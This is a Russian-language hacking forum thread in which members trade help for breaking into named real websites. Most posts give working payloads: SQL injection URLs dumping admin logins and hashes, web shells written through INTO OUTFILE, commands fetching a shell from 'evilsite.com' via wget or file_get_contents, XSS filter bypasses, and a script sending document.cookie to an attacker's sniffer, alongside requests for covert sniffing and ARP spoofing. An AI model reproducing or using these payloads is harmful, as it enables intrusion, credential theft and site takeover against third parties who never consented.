как я понял эт онажо добавить после логина ? я попытался чтото н еочень успешно

to CyberKillerz


PHP:
admin'" or "'1'"="'1#

Решено.

доброго времени суток всем.

имеется сервер 2003 r2 необходимо организовать скрытый снифинг с дальнейшей возможностью извлечения паролей из https соединения и др.защищенных протоколов. Подскажите инструментарий.желательно консольный.под винд.

на сервере 2сетевухи одна смотрит в лан а вторая в нет.насколько я понял все пакеты идут через него.

а так же интересует инструментарий по проведению апр спуфинга тоже консольный и скрытый.

Jorge_ said:
На шелле остался бэкдор вида

Code:


но при этом
Disabled PHP Functions: exec,passthru,shell_exec,system,proc_open,popen,sh ow_source
Что можно придумать?


задавая вопрос, подумай какой будет ответ....а что тебе нужно?

2lucky_dom попробуй Intercepter-NG http://sniff.su/

HAXTA4OK said:
задавая вопрос, подумай какой будет ответ....а что тебе нужно?


Конечно же, залить полноценный шелл.

Jorge_ said:
Конечно же, залить полноценный шелл.


ну так в чем проблема то? в отключенных я не вижу фун-ии eval

http://www.umoncton.ca/nouvelles/info.php?id=8297-2

http://www.umoncton.ca/nouvelles/info.php?id=8297+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39

Здесь была классическая sql-inj , но некоторое время назад произошли какие-то изменения и скуля не работает как раньше. Не могу въехать что конкретно за изменения произошли. Кто может разобраться в чем дело? Ну и конечно как это дело обойти?

Собственно нид хелп...

Кручу один сайтец.

Собственно там mysql blind

Вот такими запросами вытащил имя базы/имя юзверя.

3183' /*!30000and ascii(substring((database()),7,1))=97 and*/ 'x'='x

А теперь вопрос:

3183' /*!30000and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))

to RuDefc0n

[CODE]
Code:
length(select schema_name from information_schema.schemata limit 0,1)

[QUOTE="cat1vo"]
cat1vo said:
to
RuDefc0n
[CODE]
Code:
length(select schema_name from information_schema.schemata limit 0,1)

to Dr.Strangelove

Все отлично работает -

Version: 5.5.20

User: php_read@

Database: nouvelles

[QUOTE="RuDefc0n"]
RuDefc0n said:
Собственно нид хелп...
Кручу один сайтец.
Собственно там mysql blind
Вот такими запросами вытащил имя базы/имя юзверя.
3183' /*!30000and ascii(substring((database()),7,1))=97 and*/ 'x'='x
А теперь вопрос:
3183' /*!30000and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))

to Га-Ноцри

Там версия 5.0.92, только вот у пользователя нет доступа к information_schema, в этом то вся и загвоздка была!

cat1vo said:
to
Га-Ноцри
Там версия 5.0.92, только вот у пользователя нет доступа к information_schema, в этом то вся и загвоздка была!


Ясно Ну я так, на всякий случай спросил Просто иногда бывает тяжело искать темную кошку в темной комнате, особенно если ее там нет

Dr.Strangelove said:
http://www.umoncton.ca/nouvelles/info.php?id=8297-2
http://www.umoncton.ca/nouvelles/info.php?id=8297+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39
Здесь была классическая sql-inj , но некоторое время назад произошли какие-то изменения и скуля не работает как раньше. Не могу въехать
что конкретно
за изменения произошли. Кто может разобраться в чем дело? Ну и конечно как это дело обойти?


а.)запрос не зафолсен

б.)комментарий не поставлен

синтаксически верный запрос


Code:
http://www.umoncton.ca/nouvelles/info.php?id=8297+and+0+union+select+1,2,3,4,versio n(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9%23

Не могу разобраться с заливкой веб-шелла через MySQL inj.

Вот пример:


http://www.sstrade.ru/goods.php?id=1-1+UNION+SELECT+null,null,null,null,null,null,
0x5a65643078
+into+outfile+
0x2f746d702f6161612e706870
+--+


В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL?

Zed0x said:
Не могу разобраться с заливкой веб-шелла через MySQL inj.
Вот пример:
В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL?


Ты так не зальешь шелл. Путь к файлу надо указывать не в hex'е. Только так, например into outfile '/var/www/site.com/shell.php'

Zed0x said:
Не могу разобраться с заливкой веб-шелла через MySQL inj.
Вот пример:
В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL?


Потому что, как написал уже товарищ выше, строку, а здесь конкретно содержащую полный путь на сервере, нужно заключить в одинарные или двойные кавычки (согласно доку по мускулю), если же они фильтруются, то искать другие способы заливки.Грубо говоря, путь нужно в запросе передавать напрямую, а не в каком-либо ином виде.

Спасибо t3cHn0iD,Dr.Strangelove!

А чуть не забыл, еще вопрос: в ФАКЕ об заливке через mysql inj, написан вот такой пример:


http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+null,'text',null,null,null,nu ll+
from+accounts
+into+outfile+'/tmp/aaa.php'/*


Мне не понятно именно этот момент, зачем здесь указывать имя БД? Это вообще обязательно? Вот например SQL inj:


site.com/news.php?id=1'+union+select+1,2,'hacked'+into+outf ile+'/tmp/web_shell.php'


Данная конструкция будет работать, или же сначала нужно через information_schema вытащить БД?

Zed0x said:
Спасибо
t3cHn0iD,Dr.Strangelove
!
А чуть не забыл, еще вопрос:
в ФАКЕ об заливке через mysql inj, написан вот такой пример:
Мне не понятно именно этот момент, зачем здесь указывать имя БД? Это вообще обязательно? Вот например SQL inj:
Данная конструкция будет работать, или же сначала нужно через information_schema вытащить БД?



в mysql 3 нужно было указывать базу

Del msg

можно ли обойти такую xss фильтрацию?

$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");

$replace = array("");

Zed0x said:
Спасибо попугай, понял как заливать текст в файл php! А как теперь залить именно шелл?
Вот например вот так у меня не получается:

PHP:
http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+null,'',null,null,null,null,null+in to+dumpfile+'/tmp/25aa.php'+--+

Не подскажешь почему?


код самого шела переведи в хекс, в итоге у тебя место

должно быть 0x3c3f70687020696e636c7564652022687474703a2f2f7777 772e736974652e636f6d2f7368656c6c2e706870223f3e

Пример:


PHP:
http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+null,0x3c3f70687020696e636c75646520 22687474703a2f2f7777772e736974652e636f6d2f7368656c 6c2e706870223f3e,null,null,null,null,null+into+dum pfile+'/tmp/25aa.php'+--+

to RazyKK

Можно ipt>, оставит ну и в том же духе, я думаю вектор понятен?

cat1vo угловые скобки то выр6жутся

$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");


Если ты ее используешь, сожги код и перепиши с использованием htmltospecialchars

нет не мой, просто знаю код фильтра на сайте, над xss

http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+order+by+1--+

в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа

как незаметно для админа сервера тунелировать весь траф. Через прокси или тому подобное.

1.задача проведения атаки человек посередине.

2.как узнать пароль от веб сервера (apach виндовый) локально.

Nightmarе said:
Если order+by не прокатывает, то скорее всего прокатит group+by, что в данном случае и произошло, столбцов 12 штук, однако:
http://super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+1
Данный URL лично у меня не грузится.


Да, у меня тоже( С помощью хавиж достал, но только логины

А тут как:

http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3

http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=15

А по поводу http://super.com.co, попробуйте, может у кого откроется, нужны хеши

RazyKK said:
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>",
"INSERT", "UPDATE", "DROP"
);
$replace = array("");


Прикольно =)


A_n_d_r_e_i said:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+order+by+1--+
в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа




Code:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11#

При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uniunionon, selselectect так же false. Поэтому:


Code:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+ and+'1'='1

=)


A_n_d_r_e_i said:
Да, у меня тоже( С помощью хавиж достал, но только логины


А что помешало достать пароли?


A_n_d_r_e_i said:
http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3
http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=15


Com_wrapper, даже смотреть не буду

Возникла следующая ситуация:

Есть не рут доступ, но httpd.conf доступен на запись.

Как принудительно ребутнуть апач (или перепрочитать конфиги) , если на "service httpd graceful" не хватает прав? может кто сталкивался... грубо говоря нужно заставить его самого перезагрузиться из вне.

Code:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/xxx.ru/www/lib/core.php on line 18

а возможно как то раскрутить или это просто вывод инфы?

ну вот допустим http://www.justsims2.ru/

PHPSESSID доставляю ^ и вывод ошибки

Nightmarе said:
Раскрытие путей, по дефолту ошибка это и сообщает, хотя хрен знает что за параметр, и куда ведёт, может что то и по интересней есть...


session_start выплевывает ворнинг в случае, если передан некорректный идентификатор сессии(довольно часто встречающиеся раскрытие)

https://rdot.org/forum/showpost.php?p=23631&postcount=1855

лечится простой заглушкой @session_start();

RazyKK said:
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
$replace = array("");


Зависит от того, где будет вывод кода на странице.

В этом примере твоя фильтрация не поможет:


PHP:
...

...

document.write('.gif" />');

...

...[/COLOR]

Вектор атаки мог выглядеть так:

http://site.com/show.php?user_id="onerror="alert('XSS');//

Результат:


PHP:
'

Из-за фильтра это сделать не получится. Но так как вывод в данном случае внутри строки JS, мы можем использовать escape-последовательности \x или \u для обхода фильтра:

http://site.com/show.php?user_id=\x22\x6F\x6E\x65\x72\x72\x6F\x72\ x3D\x22\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x2 7\x29\x3B\x2F\x2F

P.S.: Это не просто просто пример, придуманный мной. Подобный код встречается в крупнейших почтовых сервисах и соц.сетях.

Кто нибудь объясните же мне, наконец!

Раньше спокойно юзал активную xss, куки приходили в полном объёме.Вот к примеру:


HTML:
SESSd9cc53338c9b7991787e099f00cbe150=hpl0badg2frce cella6toj9kn1; authcache=886e35; drupal_user=*****; drupal_uid=961; __utma=50912437.1205324149.1316182441.1330256374.1 330260320.747; __utmb=50912437.500.10.1330260320; __utmc=50912437; __utmz=50912437.1330260320.747.249.utmcsr=google|u tmccn=(organic)|utmcmd=organic|utmctr=(not provided); hotlog=1; DRUPAL_UID=961; has_js=1

Теперь приходят какие то объедки


HTML:
__utma=50912437.727943270.1327681550.1339957378.13 39957644.261; __utmb=50912437.7.10.1339957644; __utmc=50912437; __utmz=50912437.1339957644.261.5.utmcsr=google|utm ccn=(organic)|utmcmd=organic|utmctr=******* регистрация; __cfduid=d00e1872cac587b88ebc65d3c4eba687d13383037 86; b=b; hotlog=1; b=b

Где SESSID?Где drupal_user?Без них подменная не возможна.

Если ввести


HTML:
javascript:alert(document.cookie)

то мы получим такую же лабуду без SESSID и т.д.Ладно, попробуем просмотреть куки через браузер(в данном случае Mozilla) Инстурменты->Информация о странице-> Просмотреть куки и-о чудо!Всё на месте, SESSID и т.д.

Так как же быть?Если даже через обычный скрипт


HTML:
javascript:alert(document.cookie)

нельзя полностью просмотреть куки

Да, возможно у меня квадратный мозг, а эту проблему может решить полный нуб.И всё же, объясните мне, идиоту, как полностью своровать куки

Dad69 said:
нельзя полностью просмотреть куки
Да, возможно у меня квадратный мозг, а эту проблему может решить полный нуб.И всё же, объясните мне, идиоту, как полностью своровать куки


у нужных тебе куков установлен флаг HttpOnly (http://msdn.microsoft.com/ru-ru/library/system.web.httpcookie.httponly.aspx) . Проблему решит метод TRACE, но на практике почти не юзается.

Ребят, http://tools.phxglobal.com/articles.php?id=-39%20or%201=1 работает но не кидает ошибок - подскажите как решить...

LelouchMe said:
Ребят, http://tools.phxglobal.com/articles.php?id=-39%20or%201=1 работает но не кидает ошибок - подскажите как решить...


http://tools.phxglobal.com/articles.php?id=-39+union+select+1,version(),user(),4,5,6+--+

Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='

LelouchMe said:
Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='


http://m-kat.ru/info.php?search=1'uniololon+seololect+1,2http://bit.ly/MAt6Af,3,4,5и тут ещё что-нибудь напишу,6--+

LelouchMe said:
Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='




Code:
http://m-kat.ru/info.php?search='and(select+1+from(select+count(*) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))x+from+informa tion_schema.tables+group+by+x)a)--+g

Подставил правильное имя таблицы - запрос матерится - не пойму на что... http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM %20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME =aadm_users+LIMIT+0,1+--+

LelouchMe said:
Подставил правильное имя таблицы - запрос матерится - не пойму на что... http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM %20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME =aadm_users+LIMIT+0,1+--+


на тебя он матерится!

/thread43966.html

d1v said:
на тебя он матерится!
/thread43966.html


Всё сделал как там, и?

LelouchMe said:
Всё сделал как там, и?


не лги мне. читай заново.

d1v said:
не лги мне. читай заново.


да кавычки видно фильтрует вот и всё...(

LelouchMe said:
Всё сделал как там, и?


Таблицу захекси


Code:
http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM %20%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_N AME%20=0x6161646d5f7573657273+LIMIT+0,1+--+

Вопрос по склмап.

Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел.

Иньекция:


Code:
---
Place: GET
Parameter: rec
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: rec=83990 AND SLEEP(5)
---

Пытаюсь получить хоть что-то из бд:


Code:
./sqlmap.py --url=адрес --sql-query="SELECT name FROM db_name.dle_users;"

Вывод:


Code:
[09:27:24] [WARNING] the SQL query provided does not return any output
[09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
SELECT name FROM db_name.dle_users;: None

Любые попытки получить информация заканчиваются именно так.

Один раз был такой вывод:


Code:
SELECT user_id FROM db_name.dle_users; [4]:
B

!
A

Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку.

to Dmit3Y


Code:
-u "http://site.com/" --dump -D db_name -T dle_users -C name --start 1 --stop 10

+toxa+ said:
у нужных тебе куков установлен флаг
HttpOnly (http://msdn.microsoft.com/ru-ru/library/system.web.httpcookie.httponly.aspx)
. Проблему решит метод TRACE, но на практике почти не юзается.


Не только TRACE

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053


01/28/2012
protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.

to Dad69

Получение доступа к HttpOnly Cookie через XSS -> Link (http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html)

Существует ли локальный mysql брут?

попугай said:
Существует ли локальный mysql брут?


Вроде в WSO есть... не?

OxoTnik said:
Вроде в WSO есть... не?


Точно, попробую. Боюсь только что проблема в том, что возможно он будет вырубаться по таймауту, если брутить долго.

как из под рута создать домены в Linux сервере?

такая ситуация:

есть доступ в админку, есть аплоад файлов, лью shell.php, он заливается на сервер 100%, потому что я его потом через менеджер загрузки вижу среди остальных файлов и даже редактировать могу, перехожу по ссылке на него а серв грит


Code:
Невозможно обработать запрос "media/shell.php".

ps хотя например txt и jpg файлы норм открывает

ну как-то совсем обидно ((

2boortyhuhtyu http://www.debian-blog.ru/web-server/nastrojka-apache2-i-virtualnyx-xostov.html

2pirat0 ОК!

pirat0 said:
такая ситуация:
есть доступ в админку, есть аплоад файлов, лью shell.php, он заливается на сервер 100%, потому что я его потом через менеджер загрузки вижу среди остальных файлов и даже редактировать могу, перехожу по ссылке на него а серв грит

Code:
Невозможно обработать запрос "media/shell.php".

ps хотя например txt и jpg файлы норм открывает
ну как-то совсем обидно ((


Попробуй залить ../shell.php

Судя по всему жесткое ограничение на путь к директории заливки файла аплоадером и noexec на оной пресекают более-менее стандартные варианты злодеяния.

com.microsoft.sqlserver.jdbc.SQLServerException: All queries combined using a UNION, INTERSECT or EXCEPT operator must have the same number of expressions in their target lists.

A_n_d_r_e_i said:
com.microsoft.sqlserver.jdbc.SQLServerException: All queries combined using a UNION, INTERSECT or EXCEPT operator must have the same number of expressions in their target lists.


Не одинаковое кол-во колонок в запросах SELECT и UNION SELECT, если я правильно понял суть Вашего поста!

Помогите с oracle.

Как вывести логины и пассы вместе?

union+select+null,null,password,null,null,null,nul l+from+users--

union+select+null,null,username,,null,null,null,nu ll+from+users--

По отдельности выводит.

kingbeef said:
Помогите с oracle.
Как вывести логины и пассы вместе?
union+select+null,null,password,null,null,null,nul l+from+users--
union+select+null,null,username,,null,null,null,nu ll+from+users--
По отдельности выводит.




Code:
union+select+null,null,concat(username,password),n ull,null,null,nul l+from+users--



Code:
union+select+null,null,(username || ':' || password)x,null,null,null,nul l+from+users--

Вроде в WSO есть... не?


Но работает он только в версии с "suid".

Del msg

Del msg

Zed0x said:
Эмммм, в верху страницы на пол страницы)))


сори у меня чет в мозиле не было хз почему ))

а в хроме есть

Zed0x said:
Помогите подобрать колонки. При постановки ковычки вылизает ошибка базу, но почему то не получается:


http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and(1)='1

ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber

Rootz said:
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber


Основы тут (https://antichat.live/threads/43966/). Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.

Нашел на неком сайте LFI


Code:
http://******.ru/book_php.php?id=adminpidaras.php

Пытаюсь крутить


Code:
http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd



Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/******/data:.) in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(): Failed opening 'books/PHP/../../../../../../../../../../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/******/data/www/******.ru/book_php.php on line 387


Поставляю %00, и все-равно ошибка.

Подскажите что я делаю не так?

Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s)


нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.

Nightmarе said:
Не могу раскрутить никак:
http://www.novstan.ru/search/?str=ass'
Как мне кажется, там запрос типа select * from search where ass like '%$_GET[str]%'
Но никак не получается текущий запрос перекрыть, чтобы свой выполнить, делал так:
ass'), ass%'), ass%')) и так далее, но видимо кардинально не то делаю, просьба помочь кто может.




Code:
http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(), 0x00,floor(rand(0)*2)))having(min(0)or(1))%23

Melfis said:
нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.



Не Apache, а PHP

http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91

Оракл, я не силен

A_n_d_r_e_i said:
http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91
Оракл, я не силен


Там нет иньекции! Нашел на поддомене.


PHP:
http://intranet.serdan.com.co/DATAofertas/index.php?perfilId=2 union all select null,nul l,null,null--

Version:


Microsoft SQL Server 2008 (SP1) - 10.0.2573.0 (X64) Feb 4 2011 11:27:06 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)


User:


dataofertas


Database:


datahsc

Залил мини шелл. Все ок. PHPINFO показывает.

Делаю запрос


http://site.com?index.php?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));


Ничего не показывает. Начал гуглить... Перекодировал адрес сайта в BASE64.


http://site.com?index.php?a=eval(file_get_contents(base64 _decode (aHR0cDovL3I1Ny5iaXovcjU3LnR4dA==)));


Опять нет шелла(

allow_url_fopen On

allow_url_include Off

file_uploads On

При использовании функции eval() необходимо учитывать несколько факторов. Помните о том, что используемые строки должны содержать правильный PHP код, включая, к примеру, использование точки с запятой в завершение строки так, чтобы парсер не отключился на строке после eval() и правильно обработал строку code_str. Для совмещения вывода HTML и PHP кода вы можете использовать закрывающий тег PHP.

КOT said:
При использовании функции eval() необходимо учитывать несколько факторов. Помните о том, что используемые строки должны содержать правильный PHP код, включая, к примеру, использование точки с запятой в завершение строки так, чтобы парсер не отключился на строке после eval() и правильно обработал строку code_str. Для совмещения вывода HTML и PHP кода вы можете использовать закрывающий тег PHP.


Сделал так


http://site.com/index.php?a=eval(file_get_contents(base64_decode ('aHR0cDovL3I1Ny5iaXovcjU3LnR4dA==')));


PHPINFO выводит через Base64, а шелл не льется опять

to aydin-ka

Если я правильно тебя понял, то $a = eval($_GET['a']);


Code:
http://site.com?index.php?a=file_put_contents("shell.php", file_get_contents("http://site/shell.txt"));

aydin-ka said:
Сделал так
PHPINFO выводит через Base64, а шелл не льется опять


Изучи вот эти два топика:


/thread307894-osstudio.html
/showthread.php?t=191917


Должны помочь разобраться в твоем вопросе и болие.

Подскажите как в vbulletin'е узнать название колонок и таблиц?

WTSBugzoff said:
Подскажите как в vbulletin'е узнать название колонок и таблиц?



1. С помощью SQL инъекции

2. С помощью коннекта к БД

http://attacker.in/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document. cookie%29%20style=position:fixed;top:0;left:0;widt h:100%;height:100%;%22


нашел пассивку вместо alert%28document.cookie%29 вставил

type=text/javascript%20src=http://мойсайт.org/script.js

Разные варианты пробовал, но все-ровно не приходят куки на сниффер, подскажите что не так, а то заколебался.

сам script.js


location.href = "http://хостorg/s.gif?" + document.cookie;
location.href = "http://google.ru/"

Как обойти фильтрацию кавычки функцией eregi_replace ???

есть такой код:

$val){

$_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две

}

...

$rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link);

>

логин\пасс вбиваются через форму и шлются POST'OM.

Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое:

Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol').

Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!

WTSBugzoff said:
Подскажите как в vbulletin'е узнать название колонок и таблиц?


Мы продаем или покупаем!? (С) Одесситы

Поставь воблу на локалхост и мониторь через пэхапэадмин. Сначала поглядишь на локалхосте, а когда будет sql на чужом сервере уже будешь знать имена таблиц - они стандартные для всех. Если чтото изменено (что врядли) смотри имена таблиц в информайшин схеме сервера, что своего что чужого.

Помогите раскрутить MsSql


PHP:
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12, 13,14,15--+f

kingbeef said:
Помогите раскрутить MsSql

PHP:
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12, 13,14,15--+f





Code:
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12 ,13,14,15+FROM+INFORMATION_SCHEMA.TABLES+where+tab le_name+not+in+(char(115)%2Bchar(101)%2Bchar(109)% 2Bchar(105)%2Bchar(110)%2Bchar(97)%2Bchar(114)%2Bc har(115))--+f

в чаре первая таблица "seminars", далее выводим вторую "newsitems", тоже переводим ее в чар и через запятую добавляем, также надо будет делать и с колонками ))

to kingbeef

Не надо страдать ерундой и загонять в char... Все и так нормально работает.


Code:
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12 ,13,14,15+from+information_schema.tables+where+tab le_name+not+in+('seminars','newsitems')--+f

php-injection

В общем нашел сайт с уязвимостью php-injection (через POST) в поле

Как мне:

1) Вывести содержание какого-либо файла например index.php

2) Как залить shell?

Работают только подобные команды:

${@print(phpversion())} Результат: 4.4.9

${@print(php_uname())} Результат: FreeBSD fe45.hc.ru 8.2-RELEASE-p4 FreeBSD 8.2-RELEASE-p4 #0: Wed Oct 12 17:05:45 UTC 2011 root@tinderbox1.infra.hostcomm.ru:/usr/obj/i386/usr/src/sys/FE i386

${@print(mysql_get_client_info())} Результат: 4.1.25

${@print(mysql_get_server_info())} Результат: 4.1.25-log

${@print(mysql_list_dbs())} Результат: Resource id #612

${@print(phpinfo(INFO_GENERAL))} Результат (таблица) Configure Command './configure' '--enable-versioning' '--enable-memory-limit' '--with-layout=GNU' '--with-config-file-scan-dir=/usr/local/php4/etc/php' '--disable-all' '--program-prefix=' '--enable-discard-path' '--with-regex=php' '--enable-zend-multibyte' '--prefix=/usr/local/php4' '--mandir=/usr/local/php4/man' '--infodir=/usr/local/php4/info/' '--build=i386-portbld-freebsd8.2'

и т.д.

to kacergei

Ну так используйте вместо print(), include() или require(), заливать шелл можно через file_put_contents('shell.php',file_get_contents('h ttp://evilsite.com/shell.txt')), copy('http://evilsite.com/shell.txt', 'shell.php') или в system('wget -O shell.php http://evilsite.com/shell.txt'). Собственно вариантов еще много, есть из чего выбирать

cat1vo said:
to
kacergei
Ну так используйте вместо
print()
,
include()
или
require()
, заливать шелл можно через
file_put_contents('shell.php',file_get_contents('h ttp://evilsite.com/shell.txt'))
,
copy('http://evilsite.com/shell.txt', 'shell.php')
или в
system('wget -O shell.php http://evilsite.com/shell.txt')
. Собственно вариантов еще много, есть из чего выбирать


Спасибо всё работает)

Вопрос про RSA. Public key известный - 3. реально найти private key? public key - 3

Имеется скуль, присутствует фильтрация на information_schema.tables.

Как обойти? Регистр, и /*!information_schema.tables*/ не помогло.

to mikky

Тяните из columns в чем проблема то?

cat1vo Да в том и дело, что information_schema.columns как information_schema.tables фильтруется, я так понимаю безвыходная ситуация?

P.S. Приходит в голову только брут таблиц, и колонок, как в mysql

Варианты есть, надо смотреть, что и как филтруется, и после пробовать обходить! Я тоже не экстрасенс. Выложите урл, быстрее помогут Вам!

2mikky

попробуй information_schema.`tables`

Есть скуль. В имени базы данных присутствует тире ("db-name").

вывод ошибки, я так понимаю говорит о том, что ошибку вызывает именно тире в имени.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-name.user-- and id_langue=1' at line 1


Может кто то знает как это обойти?

`имя БД`

shell_c0de said:
`имя БД`


Спасибо! А то я че то торможу)))

нашёл на сервере уязвимость типа mod_isapi, но эксплоит не работает, потому что сервер висит с другими на одном и том же айпишнике, и соответственно все это работает на обратном прокси. вопрос: можно ли обойти этот самый прокси и запустить нормально эксплоит?

KeyFound!89 said:
Как обойти фильтрацию кавычки функцией eregi_replace ???
есть такой код:
$val){
$_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две
}
...
$rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link);
>
логин\пасс вбиваются через форму и шлются POST'OM.
Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое:
Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol').
Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!


Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример:

\' union select 111#

получится

select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol')

Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.

Подскажите, пж-ста:

Есть мини-шелл. Но оказалось, что на сервере allow_url_fopen off. Соответственно, при классической заливке выдает ошибку.

Каким образом можно залить полноценный шел на данный сервер?

http://www.swspace.ru/reader/index.php?id=18&page=1'

